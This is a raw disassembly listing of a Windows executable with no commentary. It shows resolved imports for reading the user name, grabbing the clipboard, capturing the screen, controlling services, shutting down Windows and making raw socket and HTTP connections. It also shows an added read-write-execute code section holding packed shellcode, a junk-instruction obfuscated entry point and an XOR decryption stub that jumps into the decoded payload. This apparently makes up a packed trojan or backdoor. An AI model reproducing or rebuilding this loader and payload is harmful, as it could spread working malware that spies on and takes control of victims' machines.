dword_435858 dd 0 ; resolved to->GDI32.GetDeviceCaps ; sub_4057AC+453�r
dword_43585C dd 0 ; resolved to->WS2_32.inet_addr ; sub_4039C6+25�r ...
dword_435860 dd 0 ; resolved to->GDI32.CreateCompatibleDC ; sub_4057AC+44B�r
dword_435864 dd 0 ; resolved to->GDI32.DeleteObjectdword_435868 dd 0 ; resolved to->WS2_32.inet_ntoa ; sub_401967+77�r ...
dword_43586C dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_4057AC+8C3�r ...
dword_435870 dd 0 ; resolved to->GDI32.BitBlt ; sub_4057AC+46B�r
dword_435874 dd 0 ; resolved to->WS2_32.WSAAsyncSelect ; sub_4057AC+658�r ...
dword_435878 dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_41175C+ED�r
dword_43587C dd 0 ; resolved to->WS2_32.send ; sub_4039C6+E2�r ...
dword_435880 dd 0 ; resolved to->USER32.ExitWindowsEx ; sub_406A11+15�r
dword_435884 dd 0 ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_402E1B+2B�r ...
dword_435888 dd 0 ; sub_4057AC+AC1�r ...
dword_43588C dd 0 ; resolved to->WS2_32.select ; sub_404F24+3C4�r ...
dword_435890 dd 0 ; resolved to->KERNEL32.QueryPerformanceFrequencydword_435894 dd 0 ; resolved to->WININET.InternetReadFile ; sub_4057AC+7EE�w ...
dword_435898 dd 0 ; sub_4057AC+BBE�r ...
dword_43589C dd 0 ; resolved to->GDI32.GetDIBColorTable ; sub_4057AC+45B�r
dword_4358A0 dd 0 ; resolved to->WS2_32.WSAGetLastError ; sub_4048D6+A1�r ...
dword_4358A4 dd 0 ; resolved to->ADVAPI32.OpenSCManagerA ; sub_4057AC+342�r ...
dword_4358A8 dd 0 ; resolved to->USER32.SendMessageA ; sub_4057AC+1AD�r ...
dword_4358AC dd 0 ; resolved to->ADVAPI32.StartServiceA ; sub_4057AC+357�r ...
dword_4358B0 dd 0 ; sub_4057AC+9BE�r ...
dword_4358B4 dd 0 ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_4057AC+377�r ...
dword_4358B8 dd 0 ; resolved to->WS2_32.ntohl ; sub_4057AC+57E�w ...
dword_4358BC dd 0 ; resolved to->WS2_32.WSAIoctl ; sub_4057AC+664�r
dword_4358C0 dd 0 ; resolved to->WS2_32.bind ; sub_4057AC+5BF�w ...
dword_4358C4 dd 0 ; resolved to->ADVAPI32.RegCloseKey ; sub_4057AC+265�w ...
dword_4358C8 dd 0 ; resolved to->ADVAPI32.ControlService ; sub_4057AC+35F�r ...
dword_4358CC dd 0 ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_4057AC+A13�r ...
dword_4358D0 dd 0 ; resolved to->IPHLPAPI.IcmpSendEcho ; sub_407DF7+116�r
dword_4358D4 dd 0 ; sub_4057AC+B99�r ...
dword_4358D8 dd 0 ; resolved to->WS2_32.gethostbyaddr ; sub_4057AC+744�r ...
dword_4358DC dd 0 ; resolved to->WS2_32.ntohs ; sub_4057AC+6DC�r
dword_4358E0 dd 0 ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_4078DE+AB�r
dword_4358E4 dd 0 dword_4358E8 dd 0 ; sub_4057AC+996�r ...
dword_4358EC dd 0 ; sub_4057AC+BAE�r ...
dword_4358F0 dd 0 ; resolved to->SHELL32.ShellExecuteA ; sub_4057AC+B1B�r ...
dword_4358F4 dd 0 ; resolved to->WS2_32.closesocket ; sub_4021B5+2ED�r ...
dword_4358F8 dd 0 ; resolved to->GDI32.CreateDIBSection ; sub_4057AC+443�r
dword_4358FC dd 0 ; resolved to->WS2_32.gethostname ; sub_4057AC+734�r
dword_435900 dd 0 ; resolved to->WS2_32.WSACleanup ; sub_40260A+48F�r ...
dword_435904 dd 0 ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_4057AC+2C9�r ...
dword_435908 dd 0 ; resolved to->WS2_32.listen ; sub_4057AC+5D9�w ...
dword_43590C dd 0 ; resolved to->WS2_32.ntohl ; sub_4021B5+E4�r ...
dword_435910 dd 0 ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_4057AC+25F�r ...
dword_435914 dd 0 ; resolved to->USER32.GetClipboardData ; sub_4057AC+1DA�r ...
dword_435918 dd 0 ; sub_4057AC+ACE�r
dword_43591C dd 0 ; resolved to->ADVAPI32.OpenProcessToken ; sub_4057AC+2BC�r ...
dword_435920 dd 0 ; resolved to->ADVAPI32.OpenServiceA ; sub_4057AC+34F�r ...
dword_435924 dd 0 ; resolved to->GDI32.CreateDCA ; sub_4057AC+436�r
dword_435928 dd 0 ; sub_4057AC+863�w ...
dword_43592C dd 0 ; resolved to->WININET.HttpSendRequestA ; sub_4057AC+818�r
dword_435930 dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_4057AC+808�r ...
dword_435934 dd 0 ; resolved to->WS2_32.ntohs ; sub_4021B5+84�r ...
dword_435938 dd 0 ; sub_4057AC+12B�w ...
dword_43593C dd 0 ; sub_406395+1C�r
dword_435940 dd 0 ; sub_406395:loc_4063DD�r
dword_435944 dd 0 ; sub_406395+50�r
dword_435948 dd 0 ; sub_4057AC:loc_405A81�w ...
dword_43594C dd 0 ; sub_406395+84�r
dword_435950 dd 0 ; sub_406395:loc_406445�r
dword_435954 dd 0 ; sub_406395+B8�r
dword_435958 dd 0 ; sub_406395:loc_406479�r
dword_43595C dd 0 ; sub_406395+EC�r
dword_435960 dd 0 ; sub_4057AC+877�w ...
dword_435964 dd 0 ; sub_406395+120�r
dword_435968 dd 0 ; sub_406395:loc_4064E1�r ...
dword_43596C dd 0 ; sub_406395+154�r
dword_435970 dd 0 ; sub_406395:loc_406515�r ...
dword_435974 dd 0 ; sub_406395+188�r
dword_435978 dd 0 ; sub_406395:loc_406549�r
dword_43597C dd 0 ; sub_406395+1BC�r
dword_435980 dd 0 ; sub_406395:loc_40657D�r
dword_435984 dd 0 ; sub_406395+1F0�r
dword_435988 dd 0 ; sub_406395:loc_4065B1�r
dword_43598C dd 0 ; sub_406395+224�r
dword_435990 dd 0 ; sub_406395:loc_4065E5�r
dword_435994 dd 0 ; sub_406395+258�r
dword_435998 dd 0 ; sub_406395:loc_406619�r
dword_43599C dd 0 ; sub_406395+28C�r
dd 2 dup(0)
dword_4359A8 dd 80h dup(0) dword_435BA8 dd 17h dup(0) ; sub_406D69+12D�o ...
dword_435C04 dd 0 ; sub_407064+5B�r ...
dword_435C08 dd 0 ; sub_407064+3E�w ...
align 10h
dword_435C10 dd 18h dup(0) ; sub_4075BC+12A�o
dword_435C70 dd 80h dup(0) ; sub_4076EC+A9�o
dword_435E70 dd 80h dup(0) ; sub_4077A8+60�o
dword_436070 dd 80h dup(0) ; sub_407820+83�o ...
dword_436270 dd 80h dup(0) ; sub_4079FD+8E�o ...
dword_436470 dd 4 dup(0) dword_436480 dd 0 ; sub_40260A+14E�o ...
dd 7Fh dup(0)
dword_436680 dd 0 ; sub_41255A+3E�w ...
dword_436684 dd 0 ; sub_401967:loc_401B79�r ...
dword_436688 dd 0 ; sub_4105D1+A2�w ...
dword_43668C dd 0 ; sub_404F24+78�w ...
dword_436690 dd 0 ; sub_40EC9A:loc_40ED17�r ...
dword_436694 dd 0 ; sub_401141+26F�w ...
byte_436698 db 0 ; DATA XREF: sub_4088B9+57�o
; sub_408A18+23B2�r ...
align 4
dd 3C2Dh dup(0)
dword_445750 dd 0D6B0h dup(0)dword_47B210 dd 0 ; sub_412471+13�o ...
dword_47B214 dd 20h dup(0) ; sub_40E745+4B8�o ...
dword_47B294 dd 10h dup(0) dword_47B2D4 dd 24h dup(0) dword_47B364 dd 0 ; sub_40E745+4CF�w ...
dword_47B368 dd 0 dd 3 dup(0)
dword_47B378 dd 0 ; sub_401DEF+62�r ...
dd 5 dup(0)
dword_47B390 dd 0 ; sub_408A18+9D6�r
dd 1Fh dup(0)
dword_47B410 dd 0 ; sub_412680+19�o
dword_47B414 dd 2B9h dup(0) dword_47BEF8 dd 0 ; sub_401DEF+47�o ...
dword_47BEFC dd 0 byte_47BF00 db 0 ; DATA XREF: sub_40863D+2A�r
; sub_40863D+33�o
align 4
dword_47BF04 dd 0 ; sub_40E745+46C�w ...
dword_47BF08 dd 0 ; sub_40E745+404�w
dword_47BF0C dd 0 ; sub_40F31C+87�o
dword_47BF10 dd 0 ; sub_40F18F+119�r ...
dword_47BF14 dd 0 ; sub_40F31C+115�w
dword_47BF18 dd 0 ; sub_40F18F+32�r ...
dword_47BF1C dd 0Dh dup(0) ; sub_40F18F+114�o ...
dword_47BF50 dd 0 ; sub_40F18F+53�r ...
align 8
dword_47BF58 dd 0 align 10h
dword_47BF60 dd 80h dup(0) byte_47C160 db 0 ; DATA XREF: sub_410BDF:loc_410C3C�r
; sub_410BDF+93�w
align 4
dword_47C164 dd 0Eh dup(0) dword_47C19C dd 0 dword_47C1A0 dd 0 dword_47C1A4 dd 0 ; sub_4180E8�r ...
dword_47C1A8 dd 0 ; .text:00416343�w
dword_47C1AC dd 0 dword_47C1B0 dd 0 ; sub_4180E8+9�r ...
dword_47C1B4 dd 0 dword_47C1B8 dd 0 ; sub_41BB79+8F�w
dword_47C1BC dd 0 ; sub_40E745+314�r ...
dd 0
dword_47C1C4 dd 0 ; sub_41B946:loc_41B9F7�r ...
dd 3 dup(0)
dword_47C1D4 dd 0 dd 0
byte_47C1DC db 0 ; DATA XREF: sub_415FC0+35�w
; sub_417FE4+5�r
align 10h
dword_47C1E0 dd 0 dword_47C1E4 dd 0 ; sub_415FC0+C1�w
dword_47C1E8 dd 0 ; sub_41B946:loc_41B958�r ...
align 10h
dword_47C1F0 dd 0 align 10h
dword_47C200 dd 0 ; sub_41AB2C:loc_41AB55�w ...
align 8
dword_47C208 dd 54h dup(0) dword_47C358 dd 0 dword_47C35C dd 0 ; sub_414BBA+192�r ...
dword_47C360 dd 0 ; sub_419E09+31�w ...
dd 2 dup(0)
dword_47C36C dd 0 ; sub_41AFCD+1D�w ...
dword_47C370 dd 0 align 8
dword_47C378 dd 41h dup(0) byte_47C47C db 0 ; DATA XREF: sub_41BB79:loc_41BB90�w
align 10h
dword_47C480 dd 0 ; sub_41BC1B+24�w ...
dword_47C484 dd 0 ; sub_41C5B0+2E�w ...
dword_47C488 dd 0 ; .data:off_42E1CC�o ...
dword_47C48C dd 0 dword_47C490 dd 0 dd 0Bh dup(0)
dword_47C4C0 dd 0 ; sub_41C5B0+14A�r ...
align 10h
dword_47C4D0 dd 0 ; sub_419E09+272�r ...
dd 0Ah dup(0)
dword_47C4FC dd 0 ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCount ; sub_41D188+39�w ...
dword_47C500 dd 0 dword_47C504 dd 0 dword_47C508 dd 0 ; sub_41E1C5+182�r ...
dword_47C50C dd 0 ; resolved to->USER32.MessageBoxA ; sub_41E453+38�w ...
dword_47C510 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_41E453:loc_41E518�r
dword_47C514 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_41E453+D6�r
dword_47C518 dd 0 ; resolved to->USER32.GetProcessWindowStation ; sub_41E453:loc_41E4D3�r
dword_47C51C dd 0 ; resolved to->USER32.GetUserObjectInformationA ; sub_41E453+9C�r
dd 30h dup(0)
dword_47C5E0 dd 0 dword_47C5E4 dd 0 ; sub_41F063+87�r
dword_47C5E8 dd 0 ; sub_41F063+4D�r
dword_47C5EC dd 0 ; sub_41F063+40�r
dword_47C5F0 dd 0 ; sub_41F063+5A�r
dd 4 dup(0)
dword_47C604 dd 0 ; sub_41F6BA+31�w ...
dword_47C608 dd 0 ; sub_41F96A+2E�w ...
dword_47C60C dd 0 dword_47C610 dd 0 dword_47C614 dd 0 dword_47C618 dd 0 ; sub_419087+F�r ...
align 10h
dword_47C620 dd 0 ; sub_417C89+5B�r ...
dword_47C624 dd 3Fh dup(0) dword_47C720 dd 0 ; sub_41AC36+87�r ...
dword_47C724 dd 0 ; sub_41ADC8:loc_41AE07�r ...
dword_47C728 dd 0 ; sub_41AE37+F5�w ...
dd 5 dup(0)
byte_47C740 db 0 ; DATA XREF: sub_41AC0D+6�o
; sub_41AE37+55�o ...
byte_47C741 db 0 ; DATA XREF: sub_415D0D+5E�r
; sub_41AC36+107�w ...
align 4
dd 40h dup(0)
dword_47C844 dd 0 ; sub_41AC36+19�r ...
align 10h
word_47C850 dw 0 ; DATA XREF: sub_41AC0D+1F�o
; sub_41AE37+10C�o ...
align 10h
byte_47C860 db 0 ; DATA XREF: sub_41AC36:loc_41AD4B�w
; sub_41AC36:loc_41AD68�w ...
align 4
dd 3Fh dup(0)
dword_47C960 dd 0 ; sub_418329+21C�r ...
dword_47C964 dd 0 ; sub_4182FE�r ...
dword_47C968 dd 0 ; sub_4182FE+8�r ...
dword_47C96C dd 0 ; sub_414DD6+18�r ...
dword_47C970 dd 0 ; sub_418329+300�w ...
dword_47C974 dd 0 ; sub_418641+5�r ...
dword_47C978 dd 0 ; sub_418329+249�r ...
dword_47C97C dd 0 ; sub_414BBA+DA�r ...
dword_47C980 dd 0 ; sub_414BBA:loc_414BF0�r ...
dword_47C984 dd 0 ; sub_417E5D+51�r ...
dd 6 dup(0)
dword_47C9A0 dd 400h dup(0) ; .data:0042D980�o
dword_47D9A0 dd 0 ; sub_417F3B�r ...
dword_47D9A4 dd 0 ; sub_41B8DD+F�r ...
dword_47D9A8 dd 0 dword_47D9AC dd 0 ; sub_415FC0:loc_41601A�r ...
dword_47D9B0 dd 0 ; sub_415FC0+62�r ...
dword_47D9B4 dd 0 ; sub_41B11D+11�w ...
_data ends
; Section 4. (virtual address 0007E000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 0007E000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
fuck segment para public 'CODE' use32
assume cs:fuck
;org 47E000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 3 dup(0)
dd 7E028h, 7E035h, 5 dup(0)
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 801D7700h, 80ADA07Ch
dd 7Ch, 4C000000h, 4C64616Fh, 61726269h, 417972h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 2 dup(0)
dd 47E07900h, 47E07D00h, 5 dup(0)
db 0
byte_47E085 db 90h ; DATA XREF: start+65�o
word_47E086 dw 25E8h ; DATA XREF: fuck:0047E1A4�o
; start:loc_47E9A2�o
dd 1, 10h, 200h, 2B0h, 6 dup(0)
dd 0A7000000h, 0B80001EBh, 0A8h, 38h, 1Ah dup(0)
dd 56000000h, 75747269h, 6C416C61h, 636F6Ch, 61427349h
dd 61655264h, 72745064h, 809A5100h, 809E017Ch, 8000007Ch
dd 7Ch, 0
dd 40000000h, 0
dd 29DE400h, 80000000h, 162E97Ch, 0
dd 72695600h, 6C617574h, 746F7250h, 746365h, 7C801AD0h
dd 4, 1, 2 dup(0)
dd 12A8D4h, 3D33h, 9B0Bh, 0
dd offset word_47E086
dd offset start
dd 0FFFFAE79h, 0E8h, 0ED815D00h, 4011B5h, 11988589h, 9D890040h
dd 40119Ch, 11A08D89h, 95890040h, 4011A4h, 11A8B589h, 0BD890040h
dd 4011ACh, 1188BD83h, 74000040h, 94A58B2Bh, 8B004011h
dd 40119885h, 9C9D8B00h, 8B004011h, 4011A08Dh, 0A4958B00h
dd 8B004011h, 4011A8B5h, 0ACBD8B00h, 0C3004011h, 1194A589h
dd 85830040h, 401194h, 8885C704h, 1004011h, 8D000000h
dd 40102885h, 95FF5000h, 401035h, 114D8589h, 9D8D0040h
dd 40112Bh, 95FF5053h, 401039h, 11458589h, 9D8D0040h, 401138h
dd 4DB5FF53h, 0FF004011h, 40103995h, 49858900h, 8D004011h
dd 4011719Dh, 0B5FF5300h, 40114Dh, 103995FFh, 85890040h
dd 401180h, 0E8h, 81665A00h, 745A4D3Ah, 0F6EB4A03h, 3C4AB70Fh
dd 5152CA03h, 0FF51046Ah, 40114995h, 0B5A5900h, 810875C0h
dd 455039h, 4A037400h, 7981D4EBh, 3DC70h, 4A037400h, 9589C8EBh
dd 401159h, 84858D51h, 50004011h, 68046Ah, 51000010h, 118095FFh
dd 8B590040h, 40118C85h, 78418900h, 1190858Bh, 41890040h
dd 0AB9517Ch, 33000000h, 0DBB58DD2h, 3004010h, 0C085ADF2h
dd 85031774h, 401159h, 9D8D60h, 53004010h, 6158D0FFh, 0E204C283h
dd 8D5159DCh, 40118485h, 46A5000h, 100068h, 95FF5100h
dd 401180h, 6D858B59h, 89004011h, 8881h, 8C81C700h, 68000000h
dd 6A000003h, 10006840h, 680000h, 6A010000h, 4595FF00h
dd 8B004011h, 0C381D8h, 8D002000h, 40108BB5h, 0B3BD8D00h
dd 33004010h, 0AB9D2h, 85AD0000h, 32974C0h, 40115985h
dd 50535000h, 1B8E8h, 8C48300h, 8D8D6058h, 4010B3h, 98BCA03h
dd 0F38BF88Bh, 8361A4F3h, 0D2E204C2h, 1151BD83h, 74000040h
dd 51858B66h, 8B004011h, 4011599Dh, 0FF38B00h, 33C7EB7h
dd 34578BFEh, 89DA2B60h, 4011559Dh, 0D33B6100h, 0D8034174h
dd 74003B83h, 8B038B3Ah, 0E9D1044Bh, 0F08C383h, 0D78B3BB7h
dd 830CEFC1h, 1A7503FFh, 0E781FA8Bh, 0FFFh, 0BD03F803h
dd 401159h, 55858B50h, 1004011h, 0FA8B5807h, 0E202C383h
dd 8BC1EBD2h, 40115D85h, 74C00B00h, 59850311h, 8B004011h
dd 401079BDh, 8708B00h, 0B58B3E89h, 401161h, 1159B503h
dd 0EE830040h, 14C68314h, 107E83h, 90840Fh, 5E8B0000h
dd 599D030Ch, 56004011h, 3595FF53h, 5E004010h, 11658589h
dd 3E830040h, 8B137400h, 59BD033Eh, 8B004011h, 8D03104Eh
dd 401159h, 7E8B12EBh, 59BD0310h, 8B004011h, 8D03104Eh
dd 401159h, 74003F83h, 0F1F8BACh, 721FE3BAh, 599D0320h
dd 83004011h, 575102C3h, 65B5FF53h, 0FF004011h, 40103995h
dd 89595F00h, 0EB018907h, 0D1E3D119h, 535751EBh, 1165B5FFh
dd 95FF0040h, 401039h, 789595Fh, 0C7830189h, 4C18304h
dd 0AB9B2EBh, 33000000h, 3B58DD2h, 3004011h, 0C085ADF2h
dd 85031774h, 401159h, 9D8D60h, 53004010h, 6158D0FFh, 0E204C283h
dd 94A58BDCh, 8B004011h, 40119885h, 9C9D8B00h, 8B004011h
dd 4011A08Dh, 0A4958B00h, 8B004011h, 4011A8B5h, 0ACBD8B00h
dd 8B004011h, 40116995h, 59950300h, 0FF004011h, 40C033E2h
dd 748B60C3h, 7C8B2424h, 0B2FC2824h, 0A4DB3380h, 6DE802B3h
dd 73000000h, 0E8C933F6h, 64h, 0C0331C73h, 5BE8h, 0B3237300h
dd 10B04102h, 4FE8h, 73C01200h, 0AA3F75F7h, 4DE8D4EBh
dd 2B000000h, 0E81075CBh, 42h, 0D1AC28EBh, 134D74E8h, 911CEBC9h
dd 8E0C148h, 2CE8ACh, 3D0000h, 7300007Dh, 5FC800Ah, 0F8830673h
dd 4102777Fh, 0C58B9541h, 8B5601B3h, 0F3F02BF7h, 8EEB5EA4h
dd 575D202h, 1246168Ah, 0C933C3D2h, 0FFEEE841h, 0C913FFFFh
dd 0FFFFE7E8h, 0C3F272FFh, 28247C2Bh, 1C247C89h, 9090C361h
dd 90909090h
; =============== S U B R O U T I N E =======================================
public start
start proc near ; DATA XREF: fuck:0047E1A8�o
mov ecx, 56Fh
sbb ebx, ebp
and ah, ah
or ebx, ebx
inc ebx
dec ebx
sbb al, 0B2h
or al, 96h
inc ebx
add al, 77h
dec edi
dec ebx
dec edi
inc ebp
add al, 3Eh
push ebx
sbb ebx, ebp
pop edi
cmp bl, ah
jnb loc_47E644
dec edi
sbb bl, ah
sbb ebx, ebx
adc ebp, ebx
inc edi
dec ebx
adc bl, bl
inc edi
push edi
inc edi
inc ebx
dec eax
xor al, 68h
inc edi
add ah, ah
pop ebx
add eax, 3FD0h
dec edi
inc ebx
push ebp
dec ebx
inc edi
dec ebx
inc ebx
dec edi
dec eax
inc eax
or eax, 7132h
loc_47E644: ; CODE XREF: start+20�j
inc ebp
pop ebp
dec ebx
dec edi
xor ebp, ebp
push ebp
pop edi
inc ebp
dec edi
xor eax, 30BBh
inc edi
xor ebx, ebp
dec eax
dec ebx
push eax
mov esi, offset byte_47E085
pop ebp
sbb ebx, ebp
and ah, ah
or ebx, ebx
inc ebx
dec ebx
sbb al, 0B2h
or al, 96h
inc ebx
add al, 77h
dec edi
dec ebx
dec edi
inc ebp
add al, 3Eh
push ebx
sbb ebx, ebp
pop edi
cmp bl, ah
jnb loc_47E6AA
dec edi
sbb bl, ah
sbb ebx, ebx
adc ebp, ebx
inc edi
dec ebx
adc bl, bl
inc edi
push edi
inc edi
inc ebx
dec eax
xor al, 68h
inc edi
add ah, ah
pop ebx
add eax, 3FD0h
dec edi
inc ebx
push ebp
dec ebx
inc edi
dec ebx
inc ebx
dec edi
dec eax
inc eax
or eax, 7132h
loc_47E6AA: ; CODE XREF: start+86�j
inc ebp
pop ebp
dec ebx
dec edi
xor ebp, ebp
push ebp
pop edi
inc ebp
dec edi
xor eax, 30BBh
inc edi
xor ebx, ebp
dec eax
dec ebx
push eax
call $+5
pop edx
add edx, 4
dec eax
pop ebx
sbb al, 0A7h
push eax
adc ah, bl
inc eax
dec edi
and al, 88h
add al, 2Bh
cmp ah, ah
jno loc_47E71C
sub ah, ah
sub bl, ah
or ebx, ebp
pop ebx
push ebx
pop ebx
inc ebp
dec ebx
sbb ebx, ebx
inc ebx
inc ebp
push eax
sub eax, 5979h
and ebx, ebp
adc ah, bl
dec ebx
dec ebp
pop ebx
cmp bl, bl
jns loc_47E73F
xor eax, 13A6h
inc edi
and ah, bl
or bl, ah
or al, 7Dh
dec ebx
sub ebp, ebx
inc ebx
sbb eax, 7D8Dh
add ah, bl
and bl, ah
xor ebx, ebp
loc_47E71C: ; CODE XREF: start+E3�j
cmp bl, bl
jnb loc_47E73E
dec ebp
adc ebx, ebp
inc ebx
push eax
and ebx, ebp
pop eax
push eax
or al, 22h
cmp ebp, ebp
jno loc_47E739
and ah, bl
loc_47E739: ; CODE XREF: start+13D�j
sbb al, 97h
sbb ah, bl
pop edi
loc_47E73E: ; CODE XREF: start+12A�j
dec edi
loc_47E73F: ; CODE XREF: start+107�j
dec edi
test ecx, ecx
jz loc_47E9A2
dec eax
sbb al, 0A7h
push eax
adc ah, bl
inc eax
dec edi
and al, 88h
add al, 2Bh
cmp ah, ah
jno loc_47E79B
sub ah, ah
sub bl, ah
or ebx, ebp
pop ebx
push ebx
pop ebx
inc ebp
dec ebx
sbb ebx, ebx
inc ebx
inc ebp
push eax
sub eax, 5979h
and ebx, ebp
adc ah, bl
dec ebx
dec ebp
pop ebx
cmp bl, bl
jns loc_47E7BE
xor eax, 13A6h
inc edi
and ah, bl
or bl, ah
or al, 7Dh
dec ebx
sub ebp, ebx
inc ebx
sbb eax, 7D8Dh
add ah, bl
and bl, ah
xor ebx, ebp
loc_47E79B: ; CODE XREF: start+162�j
cmp bl, bl
jnb loc_47E7BD
dec ebp
adc ebx, ebp
inc ebx
push eax
and ebx, ebp
pop eax
push eax
or al, 22h
cmp ebp, ebp
jno loc_47E7B8
and ah, bl
loc_47E7B8: ; CODE XREF: start+1BC�j
sbb al, 97h
sbb ah, bl
pop edi
loc_47E7BD: ; CODE XREF: start+1A9�j
dec edi
loc_47E7BE: ; CODE XREF: start+186�j
dec edi
xor byte ptr [esi], 80h
dec eax
sbb al, 0A7h
push eax
adc ah, bl
inc eax
dec edi
and al, 88h
add al, 2Bh
cmp ah, ah
jno loc_47E815
sub ah, ah
sub bl, ah
or ebx, ebp
pop ebx
push ebx
pop ebx
inc ebp
dec ebx
sbb ebx, ebx
inc ebx
inc ebp
push eax
sub eax, 5979h
and ebx, ebp
adc ah, bl
dec ebx
dec ebp
pop ebx
cmp bl, bl
jns loc_47E838
xor eax, 13A6h
inc edi
and ah, bl
or bl, ah
or al, 7Dh
dec ebx
sub ebp, ebx
inc ebx
sbb eax, 7D8Dh
add ah, bl
and bl, ah
xor ebx, ebp
loc_47E815: ; CODE XREF: start+1DC�j
cmp bl, bl
jnb loc_47E837
dec ebp
adc ebx, ebp
inc ebx
push eax
and ebx, ebp
pop eax
push eax
or al, 22h
cmp ebp, ebp
jno loc_47E832
and ah, bl
loc_47E832: ; CODE XREF: start+236�j
sbb al, 97h
sbb ah, bl
pop edi
loc_47E837: ; CODE XREF: start+223�j
dec edi
loc_47E838: ; CODE XREF: start+200�j
dec edi
inc esi
dec eax
sbb al, 0A7h
push eax
adc ah, bl
inc eax
dec edi
and al, 88h
add al, 2Bh
cmp ah, ah
jno loc_47E88D
sub ah, ah
sub bl, ah
or ebx, ebp
pop ebx
push ebx
pop ebx
inc ebp
dec ebx
sbb ebx, ebx
inc ebx
inc ebp
push eax
sub eax, 5979h
and ebx, ebp
adc ah, bl
dec ebx
dec ebp
pop ebx
cmp bl, bl
jns loc_47E8B0
xor eax, 13A6h
inc edi
and ah, bl
or bl, ah
or al, 7Dh
dec ebx
sub ebp, ebx
inc ebx
sbb eax, 7D8Dh
add ah, bl
and bl, ah
xor ebx, ebp
loc_47E88D: ; CODE XREF: start+254�j
cmp bl, bl
jnb loc_47E8AF
dec ebp
adc ebx, ebp
inc ebx
push eax
and ebx, ebp
pop eax
push eax
or al, 22h
cmp ebp, ebp
jno loc_47E8AA
and ah, bl
loc_47E8AA: ; CODE XREF: start+2AE�j
sbb al, 97h
sbb ah, bl
pop edi
loc_47E8AF: ; CODE XREF: start+29B�j
dec edi
loc_47E8B0: ; CODE XREF: start+278�j
dec edi
dec ecx
dec eax
sbb al, 0A7h
push eax
adc ah, bl
inc eax
dec edi
and al, 88h
add al, 2Bh
cmp ah, ah
jno loc_47E905
sub ah, ah
sub bl, ah
or ebx, ebp
pop ebx
push ebx
pop ebx
inc ebp
dec ebx
sbb ebx, ebx
inc ebx
inc ebp
push eax
sub eax, 5979h
and ebx, ebp
adc ah, bl
dec ebx
dec ebp
pop ebx
cmp bl, bl
jns loc_47E928
xor eax, 13A6h
inc edi
and ah, bl
or bl, ah
or al, 7Dh
dec ebx
sub ebp, ebx
inc ebx
sbb eax, 7D8Dh
add ah, bl
and bl, ah
xor ebx, ebp
loc_47E905: ; CODE XREF: start+2CC�j
cmp bl, bl
jnb loc_47E927
dec ebp
adc ebx, ebp
inc ebx
push eax
and ebx, ebp
pop eax
push eax
or al, 22h
cmp ebp, ebp
jno loc_47E922
and ah, bl
loc_47E922: ; CODE XREF: start+326�j
sbb al, 97h
sbb ah, bl
pop edi
loc_47E927: ; CODE XREF: start+313�j
dec edi
loc_47E928: ; CODE XREF: start+2F0�j
dec edi
jmp edx
; ---------------------------------------------------------------------------
dec eax
sbb al, 0A7h
push eax
adc ah, bl
inc eax
dec edi
and al, 88h
add al, 2Bh
cmp ah, ah
jno loc_47E97E
sub ah, ah
sub bl, ah
or ebx, ebp
pop ebx
push ebx
pop ebx
inc ebp
dec ebx
sbb ebx, ebx
inc ebx
inc ebp
push eax
sub eax, 5979h
and ebx, ebp
adc ah, bl
dec ebx
dec ebp
pop ebx
cmp bl, bl
jns loc_47E9A1
xor eax, 13A6h
inc edi
and ah, bl
or bl, ah
or al, 7Dh
dec ebx
sub ebp, ebx
inc ebx
sbb eax, 7D8Dh
add ah, bl
and bl, ah
xor ebx, ebp
loc_47E97E: ; CODE XREF: start+345�j
cmp bl, bl
jnb loc_47E9A0
dec ebp
adc ebx, ebp
inc ebx
push eax
and ebx, ebp
pop eax
push eax
or al, 22h
cmp ebp, ebp
jno loc_47E99B
and ah, bl
loc_47E99B: ; CODE XREF: start+39F�j
sbb al, 97h
sbb ah, bl
pop edi
loc_47E9A0: ; CODE XREF: start+38C�j
dec edi
loc_47E9A1: ; CODE XREF: start+369�j
dec edi
loc_47E9A2: ; CODE XREF: start+14E�j
mov edx, offset word_47E086
dec eax
sbb al, 0A7h
push eax
adc ah, bl
inc eax
dec edi
and al, 88h
add al, 2Bh
cmp ah, ah
jno loc_47E9FA
sub ah, ah
sub bl, ah
or ebx, ebp
pop ebx
push ebx
pop ebx
inc ebp
dec ebx
sbb ebx, ebx
inc ebx
inc ebp
push eax
sub eax, 5979h
and ebx, ebp
adc ah, bl
dec ebx
dec ebp
pop ebx
cmp bl, bl
jns loc_47EA1D
xor eax, 13A6h
inc edi
and ah, bl
or bl, ah
or al, 7Dh
dec ebx
sub ebp, ebx
inc ebx
sbb eax, 7D8Dh
add ah, bl
and bl, ah
xor ebx, ebp
loc_47E9FA: ; CODE XREF: start+3C1�j
cmp bl, bl
jnb loc_47EA1C
dec ebp
adc ebx, ebp
inc ebx
push eax
and ebx, ebp
pop eax
push eax
or al, 22h
cmp ebp, ebp
jno loc_47EA17
and ah, bl
loc_47EA17: ; CODE XREF: start+41B�j
sbb al, 97h
sbb ah, bl
pop edi
loc_47EA1C: ; CODE XREF: start+408�j
dec edi
loc_47EA1D: ; CODE XREF: start+3E5�j
dec edi
jmp edx
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 50A71C48h, 4F40DC10h, 2B048824h, 810FE43Ah, 3Fh, 0DC2AE428h
dd 535BEB09h, 194B455Bh, 504543DBh, 59792Dh, 12EB2100h
dd 5B4D4BE3h, 890FDB38h, 3Eh, 13A635h, 0E3224700h, 7D0CDC0Ah
dd 43EB2B4Bh, 7D8D1Dh, 22DC0000h, 3AEB31DCh, 1A830FDBh
